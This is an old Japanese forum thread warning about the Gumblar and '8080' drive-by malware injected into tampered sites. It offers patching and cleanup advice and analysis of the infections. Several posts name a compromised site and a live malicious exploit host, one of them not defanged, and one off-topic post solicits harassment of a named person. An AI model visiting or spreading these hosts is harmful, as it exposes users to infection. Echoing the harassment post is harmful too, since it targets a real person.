09/12/27 04:20:21
改ざんされたWebページを経由して感染するウイルスの情報・対策スレです
ウイルス情報・対策方法・脆弱性情報などをお願いします
一部のウイルス被害が増加しているようなら別スレを立てて誘導してください
現時点でGumblar(GENO)、8080(/*GNU GPL*/ や /*CODE1*/)
JustExploitなどのインジェクションが流行しています
基本的な対策としてセキュリティ・アップデートを欠かさないようにしましょう
*** 危険なサイトのアドレスはそのまま貼らないで「.」を「●」に変えてください ***
*** 感染した場合はクリーンインストールと安全なPCからのパスワードの変更を推奨します ***
【関連スレ】
GENOウイルススレ ★23
スレリンク(sec板)
2:名無しさん@お腹いっぱい。
09/12/27 04:21:08
【脆弱性を利用されやすいソフトウェア】
下記については必ずアップデートしてください
使用していないものはアンインストール推奨です
■ Windows Update / Microsoft Updateを更新
・XP以下は念のためMicrosoft Updateに変更してアップデートする
■ Adobe Reader(Acrobat,Acrobat Reader)を更新 (使っていないならアンインストール)
URLリンク(get.adobe.com)
・インストール後本体をアップデート
ヘルプ → アップデートの有無をチェック
・Acrobat Javascriptをオフにする
編集 → 環境設定 → Javascript → 「Acrobat Javascriptを使用」のチェックを外す
■ Adobe Flash Playerを更新 (動画サイト見てるなら絶対入ってる。IE版、Firefox等の非IE版に注意!)
URLリンク(get.adobe.com)
URLリンク(www.adobe.com)
・Flash Playerのバージョン確認
URLリンク(www.adobe.com)
URLリンク(www.adobe.com)
■ Adobe Shockwave Playerを更新 (最近は使わないはずなのでアンインストール)
URLリンク(www.adobe.com)
■ Java Runtime Environmentを更新 (Javascriptとは違うので注意)
URLリンク(www.java.com)
・Javaのバージョン確認
URLリンク(www.java.com)
■ QuickTimeを更新 (メールアドレスの入力は不要。使っていないならアンインストール)
URLリンク(www.apple.com)
■ RealPlayerを更新 (使っていないならアンインストール)
URLリンク(jp.real.com)
3:名無しさん@お腹いっぱい。
09/12/27 04:21:48
【アップデート支援ツール】
■ アプリケーションの脆弱性確認ツール
・MyJVN バージョンチェッカ
URLリンク(jvndb.jvn.jp)
・Secunia Personal Software Inspector (PSI)
URLリンク(secunia.com)
■ Adobeの“Flash”と“Reader”のアップデートを半自動化「Flash_Reader_Update」
URLリンク(www.forest.impress.co.jp)
URLリンク(hide9999.web.fc2.com)
4:名無しさん@お腹いっぱい。
09/12/27 04:23:10
【Gumblar.x / Daonol(新GENO)ウイルスについて】
■ Gumblar被害拡大中(1)(2)(3)
URLリンク(www.so-net.ne.jp)
URLリンク(www.so-net.ne.jp)
URLリンク(www.so-net.ne.jp)
■ Windowsが起動しないときの復旧方法の一例
黒い画面にマウスカーソル (Win32/Daonol)
URLリンク(blogs.technet.com)
Win32/Daonolの亜種に感染!セーフモードでも起動できないパソコンを復旧するには?
URLリンク(itpro.nikkeibp.co.jp)
レジストリの修復 Windowsを使わずに修復してみる
URLリンク(pctrouble.lessismore.cc)
■ 感染確認・駆除ツール
アンラボ(v3daonol.exe)
URLリンク(www.ahnlab.co.jp)
マカフィー(stinger.exe)
URLリンク(www.mcafee.com)
Kaspersky(KatesKiller.exe)
URLリンク(support.kaspersky.com)
【旧Gumblar(GENO)ウイルスのまとめなど】
*** 【注意!】2009年10月からのGumblar.x / Daonol(新GENO)には無効な情報があります ***
■ Anubisレポート
URLリンク(anubis.iseclab.org)
■ GENOウイルスまとめ
URLリンク(www29.atwiki.jp)
5:名無しさん@お腹いっぱい。
09/12/27 04:24:11
【8080系ウイルスについて】
Gumblar系とは別種のウイルスで、最近のものはページソースの最後あたりに
<script>/*GNU GPL*/
または
<script>/*CODE1*/
から始まる難読化したスクリプトが埋め込まれています
2009年12月現在、最新版のAdobe Readerおよびそれ以前の脆弱性を利用しているため
回避策としてAcrobat Javascriptのチェックを外してください
修正版の配布は2010年1月13日の予定です
他にもMicrosoftとJRE(Java Runtime Environment)の脆弱性を利用していますが
こちらはアップデートで対処できます
感染すると他のウイルスなどを呼び込むため非常に危険です
■ 新手の正規サイト改ざんでAdobe Readerのゼロデイ攻撃~今すぐ対策を
URLリンク(www.so-net.ne.jp)
6:名無しさん@お腹いっぱい。
09/12/27 04:25:02
●IPA 情報処理推進機構
Windowsの自動実行(オートラン)機能を無効にする ※USBメモリの使用に関わらず必ず設定しておくこと!
URLリンク(www.ipa.go.jp)
・Microsoft Updateは確実に適用しましょう (*「カスタム」選択更新で適用にエラーが無いか?は確認出来ます)
・ブラウザの「インターネットゾーン」のセキュリティ設定項目は、自分でよく理解して管理しておきましょう
感染するとブラウザ設定を低下させたり、悪意のあるサイトURLを信頼済みサイトへ登録するスパイウェアも存在します
・普段のブラウズは、サードパーティCookieをブロックする設定以上にしておけばスパイウェア予防にもなります
・「アドオンの管理」から、普段ブラウザで読み込まれるアドオン(Webブラウザ拡張機能)の内容は把握しておきましょう
・ソフトウェアやブラウザ(Webプラグイン類も)の最新版Updateとセキュリティ設定を常に心掛けましょう
(*Adobeソフト、動画Player、圧縮解凍ソフト、Office系ソフト、Mailソフト、Sun MicrosystemsのJavaなど)
(*普段、使わないようなWebプラグイン類はアンインストールしておきましょう → 必要時だけ最新版を使用する)
・インターネット上の「無料で配布されているモノ」は、基本的には“疑って”下さい (*VirusTotal.comスキャンを活用)
・怪しいメールや圧縮ファイルは、絶対に開かないようにしましょう (*危険な餌に釣られない用心を持ちましょう)
・週に何回かは、Nortonで「システムの完全スキャン」を実行しましょう
・スキャンでリスクが検出された場合、駆除と同時にSymantecのサイトでリスクによる「被害内容」を確認しましょう
・「タスクマネージャーの常駐プロセスexe」の内容も把握しておきましょう
・Windowsの付加的「サービス」は、攻撃の侵入経路に利用されることもあるので脆弱性となる項目は停止しておきましょう
・大事なIDやパスワードの自己管理には十分に注意しましょう (*IDセーフ機能も活用)
●Webサイトの脆弱性、IPAから指摘しても6割が対応未完了 2009/7/24
サイト運営者やDNSサーバー管理者、Webアプリケーションの開発者に対して脆弱性の確認と対策の実施を求めている
URLリンク(internet.watch.impress.co.jp)
7:名無しさん@お腹いっぱい。
09/12/27 04:25:21
*** テンプレ終了 ***
抜け、間違いがあれば指摘よろ
8:1
09/12/27 04:26:14
ごめん続けて
9:名無しさん@お腹いっぱい。
09/12/27 04:26:15
Norton +α Defense (Method of JAPAN Norton Forum)
・「a-squared Free 4.5」 ウイルス・トロイの木馬のスキャンと駆除 (*常駐保護は無し *日本語インターフェイス )
URLリンク(www.emsisoft.com)
サービス > 「a-squared Free Service」を無効 > 停止 > 適用で「自動Update常駐 a2service.exe」の停止=手動Update
・「a-square MalAware 1.0」 クラウドスキャナ (*クイッククラウドチェック、a-squared Freeとの併用がベストです)
*インストール不要 *頻繁にプログラムアップデートしているので都度ダウンロードして試してみて下さい
URLリンク(www.emsisoft.com) (URLリンク(i46.tinypic.com)
)
・「Malwarebytes' Anti-Malware 1.42」 ウイルス・スパイウェアのスキャンと駆除 (*常駐保護は無し *手動Update)
URLリンク(www.malwarebytes.org) (*「Protection」ページの機能はNortonとの共存の為に設定しないで下さい)
・「ReducedPermissions」 (手動Windows Updateやオンラインスキャンはエラーに *導入時には「ブロックの解除」設定を)
・「Spyware Blaster 4.2」 危険サイトの制限、危険ActiveXの実行制限処置 (*手動Update *Flash Killer機能も実用的です)
・「Live OneCare PC セーフティ (オンラインスキャン *駆除も可能 *月1・2回程度のチェックでOK)」
URLリンク(onecare.live.com)
・「a-squared HiJackFree 3.1」 URLリンク(www.hijackfree.com) (*詳細な自己診断ビューア *日本語インターフェイス)
(*インストール後、歯車アイコンから一度アップデート → その後はオフでOK URLリンク(i45.tinypic.com)
)
10:名無しさん@お腹いっぱい。
09/12/27 04:26:56
■詐欺・罠サイトURLの報告 - Symantec Security Response 〔Report Suspected Phishing Sites〕
URLリンク(submit.symantec.com) (記入例 URLリンク(i38.tinypic.com)
)
*ワンクリック詐欺や詐欺ソフトのダウンロードを仕向けるURLの報告(*複数の場合はenter moreで報告枠追加できます)
*インターネット中に、奇妙な動作を感じたページや、悪意のある動画やゲーム系サイトの報告もOK
*思わぬサイトへ飛ばされた場合などは、リンク元ボタンを右クリック > プロパティでURL確認
■未対応リスクや疑わしいファイルを検疫経由でSymantecへ送信 (*最大10MB以下?までのサイズ)
タスクトレーのNortonアイコンを右クリック「最近の履歴を表示」 > 「検疫」を選択
検疫に追加 (*明らかに未対応リスクである場合は、「ディスクからファイルを削除」にチェック(=検疫と同時に削除))
検疫後、「詳細」 > 下列にある「処理」 > 「Symantecへ提出」をクリック
■疑わしいファイルの提出 - Symantec Security Response 〔Upload a suspected infected file〕
*ファイルや圧縮ファイル〔Password無し、File数9個未満、10MB未満〕やtxtレポートで調査依頼の提出が出来ます
URLリンク(submit.symantec.com) (記入例 URLリンク(i36.tinypic.com)
)
■Nortonが誤検出してしまうファイルの報告 - Symantec Security Response 〔False Positive Submission〕
URLリンク(submit.symantec.com) (記入例 URLリンク(i38.tinypic.com)
)
●JVN iPedia -脆弱性対策情報データベース (*使用しているソフトウェアの最新版への更新を心掛けましょう)
「脆弱性」とは、ソフトウエア製品やウェブアプリケーション等におけるセキュリティ上の問題箇所(ウィークポイント)です
URLリンク(jvn.jp)
■「URLリンク(www.virustotal.com)」 (37社のファイルスキャンサービス *圧縮ファイルの状態でもOK)
■「URLリンク(onlinelinkscan.com)<)(セキュアブレイン gred)」 (国産サイト安全性チェックサービス … ワンクリ詐欺 ,Web攻撃の有無など)
11:名無しさん@お腹いっぱい。
09/12/27 04:27:38
「漫画・イラストも児童ポルノ規制対象に」約9割─内閣府調査 2007/10/25
ネット上の「有害情報」を規制すべきという回答も約9割に上った
URLリンク(www.itmedia.co.jp)
オークション詐欺にひっかからないように、犯人の手口を頭に入れておきたい 2009/02/20
URLリンク(www.yomiuri.co.jp)
「YouTube」に投稿された動画のうち,最大で約4900本のコメント欄に,悪意あるWebページへのリンク 2009/05/25
URLリンク(itpro.nikkeibp.co.jp)
米IBMは2009年上半期のセキュリティ動向を報告し、Webを通じた脅威がかつてないほど危険な状態にあると警告 2009/08/27
URLリンク(www.itmedia.co.jp)
「OSよりもアプリケーションが狙われる」、セキュリティ組織が警告 2009/9/16
Adobe ReaderやFlash Playerなどの脆弱性が危ない、「すぐに解消を」
URLリンク(pc.nikkeibp.co.jp)
米連邦捜査局(FBI)が、SNSを舞台にした犯罪が増えていると注意を呼びかけ 2009/10/2
Social Network Service = さまざまな参加呼びかけ型コミュニケーションサイト
URLリンク(www.computerworld.jp)
個人情報をさらすマルウェア、ポルノゲームのインストールファイルを装って流通している 2009/11/30
URLリンク(www.itmedia.co.jp)
ワンクリック不正請求トラブル、相談事例が半年で1万7794件 2009/12/4
URLリンク(internet.watch.impress.co.jp)
Gumblar被害拡大中(3) 予防対策:一般ユーザーの方、サイト管理者の方へ 2009/12/11
URLリンク(www.so-net.ne.jp)
12:◇テンプレここまで
09/12/27 04:29:25
*** テンプレ終了 ***
13:名無しさん@お腹いっぱい。
09/12/27 04:30:48
いきなり荒らし?
>>9-11ってノートンスレのテンプレであって関係ないよな?
14:名無しさん@お腹いっぱい。
09/12/27 05:23:44
「漫画・イラストも児童ポルノ規制対象に」約9割─内閣府調査 2007/10/25
ネット上の「有害情報」を規制すべきという回答も約9割に上った
URLリンク(www.itmedia.co.jp)
オークション詐欺にひっかからないように、犯人の手口を頭に入れておきたい 2009/02/20
URLリンク(www.yomiuri.co.jp)
「YouTube」に投稿された動画のうち,最大で約4900本のコメント欄に,悪意あるWebページへのリンク 2009/05/25
URLリンク(itpro.nikkeibp.co.jp)
米IBMは2009年上半期のセキュリティ動向を報告し、Webを通じた脅威がかつてないほど危険な状態にあると警告 2009/08/27
URLリンク(www.itmedia.co.jp)
「OSよりもアプリケーションが狙われる」、セキュリティ組織が警告 2009/9/16
Adobe ReaderやFlash Playerなどの脆弱性が危ない、「すぐに解消を」
URLリンク(pc.nikkeibp.co.jp)
米連邦捜査局(FBI)が、SNSを舞台にした犯罪が増えていると注意を呼びかけ 2009/10/2
Social Network Service:さまざまな参加呼びかけ型コミュニケーションサイト
URLリンク(www.computerworld.jp)
セキュアブレインが、「Gumblerウイルス」と類似した新たな攻撃手法を確認 2009/10/23
企業に「gredセキュリティサービス 無償トライアル版」を利用し、自社ウェブサイトの検査を行うよう呼びかけ
URLリンク(antivirus-news.net)
迷惑メールからあなたを守るためのチェックリスト 2009/11/10
URLリンク(japan.zdnet.com)
15:名無しさん@お腹いっぱい。
09/12/27 05:24:56
「漫画・イラストも児童ポルノ規制対象に」約9割─内閣府調査 2007/10/25
ネット上の「有害情報」を規制すべきという回答も約9割に上った
URLリンク(www.itmedia.co.jp)
オークション詐欺にひっかからないように、犯人の手口を頭に入れておきたい 2009/02/20
URLリンク(www.yomiuri.co.jp)
「YouTube」に投稿された動画のうち,最大で約4900本のコメント欄に,悪意あるWebページへのリンク 2009/05/25
URLリンク(itpro.nikkeibp.co.jp)
米IBMは2009年上半期のセキュリティ動向を報告し、Webを通じた脅威がかつてないほど危険な状態にあると警告 2009/08/27
URLリンク(www.itmedia.co.jp)
「OSよりもアプリケーションが狙われる」、セキュリティ組織が警告 2009/9/16
Adobe ReaderやFlash Playerなどの脆弱性が危ない、「すぐに解消を」
URLリンク(pc.nikkeibp.co.jp)
米連邦捜査局(FBI)が、SNSを舞台にした犯罪が増えていると注意を呼びかけ 2009/10/2
Social Network Service:さまざまな参加呼びかけ型コミュニケーションサイト
URLリンク(www.computerworld.jp)
ネット検索は信用できない? ユーザー詐称する広告代理店を処罰 2009/10/28
盗んだ個人情報で4900個ものアカウントを作り、一般ユーザーのふりをして「ここがよかったよ~」と、
特定のお店やWebサイトの宣伝をしていた。つまり、私達が利用したのは知識検索ではなく広告検索だった
URLリンク(pc.nikkeibp.co.jp)
ミクシィ、4200人情報"露出"…ゲーム課金不具合 2009/11/04
実際に制作・運営しているのは中国のゲーム会社「リクー・メディア」
URLリンク(www.yomiuri.co.jp)
16:名無しさん@お腹いっぱい。
09/12/27 05:28:46
【ヤフオク】Nortonキー出品まとめ②・悪い評価
■fantastic_kids_1999
特別に提供されたものを使用したが使えなかった。代替えとおまけで他の出品も提供されたがそれも使えなかった。
結局何も使えなかった。こんなやつの出品は所詮こんなもんでしょう。 (評価日時:2009年 6月 13日 15時 11分)
■intelli2009
プロダクトキーが使えなくなり、有効期間も0日に…詐欺でしょうか?(評価日時:2009年 9月 17日 7時 03分)
■number2009livecn(停止中)
期限切れ (評価日時:2009年 11月 5日 11時 08分)
■uxk1216
落札当初、2年間の有効期限と説明を受けていたが、3ヶ月目で更新期限切れが来てしまいました、
どういう事でしょうか? (評価日時:2009年 10月 25日 22時 24分)
■min9763557(停止中)
購入時は認証できましたが、3ヶ月もせず期限切れになりました。許せません。 (評価日時:2009年 11月 12日 17時 29分)
■yuanchong525
こいつはすぐに期限が切れるものを売りつけてます。詐欺です。
まあ騙された自分が馬鹿だったんですけど、みなさんも気をつけてください。(評価日時:2009年 9月 13日 22時 49分)
■seven_stars_king2000
Yahoo! JAPAN IDが無効です。
■andriy_shevchenko1976929
Yahoo! JAPAN IDが無効です。
■bottega_choice(停止中)
落札、代金支払後に取引停止となり、メール送信しても連絡無く、最悪です。 (評価日時:2009年 10月 20日 17時 03分)
■wxk1216(停止中)
海賊版でした。7日後に期限切れになりました。サポートも不可 (評価日時:2009年 10月 7日 21時 41分)
17:名無しさん@お腹いっぱい。
09/12/27 05:34:27
____
n /⌒ ⌒\
| | /( >) (<)\
i「|^|^ト、/::::::⌒(__人__)⌒::::\ >>1乙だお!
|: :: ! } | /| | | | | |
ヽ ,イ \ (、`ー―'´, /
18:名無しさん@お腹いっぱい。
09/12/27 10:39:45
いきなり嵐にはわろうた
19:名無しさん@お腹いっぱい。
09/12/27 10:41:55
あかかげまるの家庭を壊す案を広く募集いたしております。
URLリンク(www014.upp.so-net.ne.jp)
ちなみに地図はこちらです。
URLリンク(www.mapion.co.jp)
20:名無しさん@お腹いっぱい。
09/12/27 15:40:24
>>1乙
8080(/*GNU GPL*/ や /*CODE1*/)って
いまのところ検知するのノートンとAVASTだけなの?
他のソフトはスキャンでもスルー?
21:名無しさん@お腹いっぱい。
09/12/27 15:57:14
>>20
カスペも検知する。
22:名無しさん@お腹いっぱい。
09/12/27 16:04:28
>>21
(/*GNU GPL)踏んでカスペオンラインチェックで出てこなかったってどっかで見たけど
23:名無しさん@お腹いっぱい。
09/12/27 16:12:49
8080系で>>4みたいな感染確認は無いですかね?
24:名無しさん@お腹いっぱい。
09/12/27 16:19:57
スクリプトをいくつか踏んでみたけど、どうもまちまちみたい
定義ファイルの結果だから実際はもう少し検出するだろうけど
日付はindex.htmlのもの
/*GNU GPL*/
24日 結果: 7/41
URLリンク(www.virustotal.com)
26日 結果: 0/41
URLリンク(www.virustotal.com)
/*CODE1*/
22日 結果: 9/41
URLリンク(www.virustotal.com)
25:名無しさん@お腹いっぱい。
09/12/27 16:45:21
>>23
一例としてsiszyd32.exeをスタートアップに登録するみたいだ
もっともこれが他のウイルスを呼び込むから
感染してたらどうなっているやら・・・
URLリンク(www.so-net.ne.jp)
URLリンク(htlogs.com)
26:名無しさん@お腹いっぱい。
09/12/27 16:47:56
感染の疑いがある場合はAvastとか検出報告のあるソフトで試してみるしか確認も出来ないってことですか?
ポートチェッカーで80や8080が解放されてるものの応答は無し判定だったんですが
やはり黒でしょうか
27:名無しさん@お腹いっぱい。
09/12/27 17:14:33
>>26
avast!は比較的スクリプトには反応するが
ウイルス本体を検出するかは検体を持っていないから分からない
個人的な印象になるが、ウイルス名やファイル名でググって見ると
本体の検出はKaspersky・Microsoft・Symantecあたりが強そうかな?
PCに詳しくないなら
ウイルス対策ソフトでフルスキャンをかけていろいろ検出したら
クリーンインストールが無難だろうな
28:26
09/12/27 17:32:24
>>27
そうですか・・・
一応常駐インスコしてあるマカフィーでフルスキャン、カスペオンラインでスキャン
トロイスレに貼ってあったトロイスキャナーでオンラインスキャンして
何一つ検出されませんでした
(トロイスキャナーで有害度の低いクッキーがちょろっと出てきたのみ)
siszyd32.exeも出てこずMSアップデートも問題なく、再起動も出来てるのですが
これはもう白なんですかね
一日経過しましたが、いまのところプロセスにおかしな挙動をしているものは見当りません
確かに踏んだサイトには/*GNU GPL*/ のスクリプトが挿入されてたようなんですが
29:名無しさん@お腹いっぱい。
09/12/27 17:35:36
あ、あとsymantecのポートチェックもやりましたがこっちは全部白でした
(8080系のポートはチェック対象外のようでした)
30:名無しさん@お腹いっぱい。
09/12/27 18:11:36
>>28
それだけスキャンしてクッキーくらいなら白、なんだろうな
どういう経緯で感染したと思ったのかが分からないが
サイト踏んだと同時にアンチウイルスが反応したんなら
水際で阻止しているだろうし、アップデートで対策されてたら問題ないはず
31:名無しさん@お腹いっぱい。
09/12/27 18:43:17
>>30
いえ、あっちのスレこっちで黒判定されてるサイトを迂闊に踏んでしまって
(偶然すぐに閉じてはいたのですが、マカフィーは無反応
その時は感染サイトだとは気付かず)
感染サイトだと知ってから携帯で該当サイトをもう一度踏んでみて、サイトの最下部に/*GNU GPL*/ を含む
恐らく難読化されたスクリプトが挿入されてるのを見まして
ちなみに踏んだのはGENOスレ290注意喚起されてたサイトなのですが、現在ではスクリプト部分は削除されているようで
今となっては再びの確認が取れません
IEでJAVAスクオンで踏んだんですが、何故生き残ったのか・・・
生き残ったのなら幸いですが、定義ファイルが追いついていないだけだとすると怖いものがあります
とりあえず様子見してみます。ありがとうございました
32:名無しさん@お腹いっぱい。
09/12/28 00:17:17
>>24
ノートンは実際にサイトに訪問したとき反応する
virustotalでスクリプトの部分をスキャンしても反応しない
33:名無しさん@お腹いっぱい。
09/12/28 00:27:56
つまり一度感染したらAVAST以外で確かめる術がないってこと?
でもAVASTも誤検出騒ぎで落ち着かないよな
どうすりゃいいんだ
34:32
09/12/28 00:38:53
>>33
感染後のことは知らない
あくまでもスクリプトのスキャンの話
35:名無しさん@お腹いっぱい。
09/12/28 00:42:02
>>34
ああそうか、スマン読み違えてた
36:名無しさん@お腹いっぱい。
09/12/28 00:44:32
>>33
どっかに書かれているだろうど
OSに最新のアップデートを適用しておく
Adobe製品やSunのJavaなどがインストールされていれば同様にアップデートしておく
Adobe ReaderはJavaScriptを切っておく
どうしても不安ならwebブラウザのJavaScriptを切っておけばほぼ無害
機種によるかも知れないがルーターで切ることも出来る
37:名無しさん@お腹いっぱい。
09/12/28 00:45:56
>>36
いや感染(疑い)後の話よ
どのスキャンでも上がってこないらしいじゃん
38:名無しさん@お腹いっぱい。
09/12/28 00:50:27
あとはHIPSの強力なファイアウォールなどのセキュリティ製品を使う
設定もよりきつめにすれば思わぬマルウェアの実行やファイルやレジストリの書き換えも防げる
確証はないがほぼ防げるんじゃないだろうか
Outpost、Comodo、Online Armor、PC toolsなど
39:名無しさん@お腹いっぱい。
09/12/28 00:52:47
>>37
感染後はどうなるのかと言う情報ある?
40:名無しさん@お腹いっぱい。
09/12/28 00:54:28
>>37
そこまで心配する人なら、疑いのあるサイト行ってしまった自覚があるならOSごとクリーンインスコが精神上一番良いと思う
日々コードも引き連れてくるマルウェアも変化してるものに、どこのベンダーのものが100%検知可能!とか言えない
GumblarなんてHijackThisでも見つけにくいとか報告あったし
41:名無しさん@お腹いっぱい。
09/12/28 00:56:23
あと肝心なことは
感染してもすぐに復旧できるようにバックアップを取っておく
42:名無しさん@お腹いっぱい。
09/12/28 00:57:48
>>39
ない
踏んだって話は色々見かけるが、どうなったっていうレスを見ない
誰か実際やった奴いないんだろうか
43:名無しさん@お腹いっぱい。
09/12/28 01:01:23
8080系はいわゆるダウンローダーで
次々にウイルスをダウンロードしては実行するので
感染したが最後、収拾がつかなくなるはず
だからダウンローダーを削除しても他のウイルスに
感染している可能性が高い
ある意味Gumblarよりたちが悪い
ここの下あたりに動作が記載されてる
URLリンク(www.so-net.ne.jp)
44:名無しさん@お腹いっぱい。
09/12/28 01:02:38
webサイトを管理してるなら
パスワードを変更するのも忘れずに
感染しても今のところweb改竄の被害を受けるだけなのかな
俺がはやりのGNU GPLのスクリプト試したときはpdfup.exeと言うのが落ちてきただけだったな
45:名無しさん@お腹いっぱい。
09/12/28 01:10:34
view-source:URLリンク(digimaga.net)
<script>/*GNU GPL*/・・
デジマガ、アウト。
46:名無しさん@お腹いっぱい。
09/12/28 01:10:34
試す環境がある人でも2回目のアクセスの時は404返すようになったりと素晴らしい工夫がなされてたりして
検証しにくかったりするんだよな
俺は仮想環境とかないのでやったことないけど・・・・
>>44
パスワード変更するのは良いが、感染してないって言い切れる環境でのパスワード変更ってのが必須だな
感染してる環境からパスワード変更はまったく意味ないしw
8080系の奴ってSo-netの記事によると、改竄だけじゃ済まないみたいよ
URLリンク(www.so-net.ne.jp)
>ちなみに、攻撃成立時に実行されるウイルス本体は、「Bredolab」や「HDrop」で検出されたり、汎用名で検出されたり、検出できなかったりと、こちらも微妙だ。
>困ったことに、このウイルスは他の不正なプログラムをダウンロード・実行するのが主な役目で、実行時にシステムに何がインストールされたかがわからない。
>情報を盗み取るスパイウェアやパスワードスティーラ―、外部からパソコンを操るためのボット、偽ウイルス対策ソフトなど、これまでに様々な脅威をインストールして来た系列のウイルスだ。
47:名無しさん@お腹いっぱい。
09/12/28 01:12:08
>>45
志村ー、URLURL
48:名無しさん@お腹いっぱい。
09/12/28 01:13:04
>>45
貼っちまったよ・・。
対策ない奴は、絶対開くなよ。
49:名無しさん@お腹いっぱい。
09/12/28 01:14:32
>>46
分からないって書いてあるじゃん
分かってないのか分かってないのか微妙な文章だが
50:名無しさん@お腹いっぱい。
09/12/28 01:15:42
分かってないのか分かってるのか微妙な文章だw
最後はこういうウイルスの一般的な動作を述べてるだけじゃないか
51:46
09/12/28 01:17:22
レスした後再度読み直してみたら、微妙な文章ですね・・・
まあでも、最悪こういう自体になりかねないよって言う脅しには良いんじゃないかと・・・
52:名無しさん@お腹いっぱい。
09/12/28 01:29:27
>>45
JR東日本のサイト改ざん。『/*GNU GPL*/』の不正なJavaScriptコード
URLリンク(blogs.yahoo.co.jp)
コレと一緒っぽいな。
53:名無しさん@お腹いっぱい。
09/12/28 01:30:41
万一に備えてシステムをバックアップ
True Imageなどのシステムをバックアップするソフトがない場合
お薦めフリーソフト
Paragon Backup & Recovery 10 Free Edition
URLリンク(www.paragon-software.com)
起動メディアを作っておけば起動メディアから復元はもちろんバックアップも出来る
Macrium Reflect FREE Edition
URLリンク(www.macrium.com)
EASEUS Todo Backup
URLリンク(www.todo-backup.com)
54:名無しさん@お腹いっぱい。
09/12/28 01:33:13
たしかアニたまのサイトもそれだった気がするんだが
あんまり大きな騒ぎにはならなかったよな
潜伏してるのが多いのか?
55:名無しさん@お腹いっぱい。
09/12/28 01:38:04
今騒ぎになってきてるじゃないですか。ゼロデイ突いてくるドライブバイダウンロードが有名サイトにぞくぞくとってことで
56:名無しさん@お腹いっぱい。
09/12/28 01:41:11
adobeもjavascriptとか最初から危なっかしいの分かるような機能入れるなよ
ちゃんと対応できるならまだしも全然駄目じゃないか
アホすぎ
57:名無しさん@お腹いっぱい。
09/12/28 01:45:29
>>45
セーフだろうが。嘘を書くなよ
58:名無しさん@お腹いっぱい。
09/12/28 01:47:36
>>57
まさか、ウィルススキャンでチェックしてスルーしたからセーフとか言ってないよな?
59:名無しさん@お腹いっぱい。
09/12/28 01:48:31
ね、URLそのまま晒すとこんな奴出てくるでしょ。>>57
晒すときは>>1をよく読もう
>*** 危険なサイトのアドレスはそのまま貼らないで「.」を「●」に変えてください ***
>>56
そしてその危なっかしいものを有効活用しているところがあるという・・・
URLリンク(slashdot.jp)
60:名無しさん@お腹いっぱい。
09/12/28 01:51:09
>>58
自己レス
URLリンク(digimaga)●net/
開くと、JREが起動して、アクセスに行こうとするな。ロシアのサイト。
61:名無しさん@お腹いっぱい。
09/12/28 01:51:33
デジマガ/*GNU GPL*/あるな
で、>>57は踏んだのか? どうなった?
62:名無しさん@お腹いっぱい。
09/12/28 01:56:24
>>61
ここに行こうとしてるな。
adsrevenue-net.king.com.newgrounds-com.themobilewindow●ru:8080
やられてるだろ。これ。
63:名無しさん@お腹いっぱい。
09/12/28 01:58:05
>>61
adsrevenue-net.king.com.newgrounds-com.themobilewindow●ru:8080
ここに向けてリクエスト出してんぞ。
まぁ確実かな。
64:名無しさん@お腹いっぱい。
09/12/28 01:58:54
pdfupd.exeが落ちてくる
virustotalではどれも検出しない
65:名無しさん@お腹いっぱい。
09/12/28 02:00:47
>>62-63
普通踏んだら速攻で(この場合はロシアから)何か運んでくるものなの?
初心者でゴメン
なんかファイルができたとか、そういう話は今回あまり聞かないよね
66:名無しさん@お腹いっぱい。
09/12/28 02:03:27
pdfupd.exeを実行する何かダウンロードして
_ex-68.exeを実行しようとするのでこの辺でやめといた
67:名無しさん@お腹いっぱい。
09/12/28 02:05:29
>>65
いかにユーザーに感染したのが分からないように感染させるのかがマルウェア制作者の腕の見せ所
68:名無しさん@お腹いっぱい。
09/12/28 02:09:32
>>64.66
どうもありがとう。踏んでてpdfupd.exeが隠しファイル含めて上がってこなかったらセーフかな
69:名無しさん@お腹いっぱい。
09/12/28 02:11:43
>>65
踏んだら速攻でダウンロード実行される
ドライブバイダウンロードというやつか
適切なアップデートをしておけば問題ない
もちろんセキュリティソフトが停止させる場合もあるが
70:名無しさん@お腹いっぱい。
09/12/28 02:12:18
>>68
「上がる」って、JREやFlash経由で落ちてくるから、ダウンロードポップアップはおろか、IEのキャッシュにも残らない可能性があるからな
念のため言っておくが。
71:名無しさん@お腹いっぱい。
09/12/28 02:14:43
>>70
いや試したのはJAVAもFlashもインストールされてない環境だ
MSの脆弱性かな
もちろんJAVAやFlashの脆弱性を突かれた場合は同じような動作をするかどうかは分からない
72:名無しさん@お腹いっぱい。
09/12/28 02:16:27
実行ファイルも残らないの?
セキュソフトの定義更新が間に合ってなかったら、もう感染確定の判断はできないのかな
バカでゴメン
73:名無しさん@お腹いっぱい。
09/12/28 02:20:48
>>72
テストしたときは残った
ただテストでは最後まで実行させず途中で終了させた
最後にすべて削除するようなこともあるかも知れない
まあ分からないってことだ
74:名無しさん@お腹いっぱい。
09/12/28 02:22:26
>>73
そっか・・・ありがとう
とりあえずPCの挙動が安定してるうちは様子見して、各種セキュソフトの対応待つよ
75:名無しさん@お腹いっぱい。
09/12/28 02:27:02
難読化といてみると、ただJSを落としてるだけっぽいな。
他のJSをダウンロードしてる先が、ロシアってことか。
そいつがさらに脆弱性ついて、ドライブバイダウンロードするって事か。
76:名無しさん@お腹いっぱい。
09/12/28 02:29:11
>>45
今Aviraで試したらwebguardが検出した。
URL "URLリンク(adsrevenue-net.king.com.newgrounds-com.themobilewindow.ru:8080)" のデータにアクセスする際に、
ウイルスまたは不要なプログラム 'EXP/DirektShow.A' [exploit] が検出されました。
77:名無しさん@お腹いっぱい。
09/12/28 02:30:01
あ、ごめん
直リンしちまったじゃねえか
>>76
はウイルス
注意
78:名無しさん@お腹いっぱい。
09/12/28 02:37:55
pdfupd.exeってやつ
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
URLリンク(anubis.iseclab.org)
同じURLから27日午前9時頃拾ったやつ
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
79:名無しさん@お腹いっぱい。
09/12/28 02:43:33
pdfupd.exe って名前から判断して、またAdobeReaderの脆弱性か?。
たしかコレって、ゼロデイの可能性ありってやつじゃなかったか?
URLリンク(www.adobe.com)
これじゃねーだろうなぁ。
これだったら、Js切るか、AdobeReaderアンインスコしない限り、対策ないぞ。
80:名無しさん@お腹いっぱい。
09/12/28 02:48:41
>>79
あんた、ちょっと遅れてる・・・・
新手の正規サイト改ざんでAdobe Readerのゼロデイ攻撃~今すぐ対策を
URLリンク(www.so-net.ne.jp)
Adobe Reader 及び Acrobat の未修正の脆弱性に関する注意喚起(JPCERT/CC)
URLリンク(www.jpcert.or.jp)
